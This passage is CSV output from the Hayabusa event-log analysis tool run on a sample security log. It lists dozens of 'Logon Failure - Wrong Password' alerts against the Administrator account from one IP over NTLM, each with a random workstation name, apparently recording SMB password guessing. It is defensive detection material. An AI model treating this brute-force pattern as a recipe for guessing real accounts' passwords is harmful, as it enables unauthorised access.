NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: 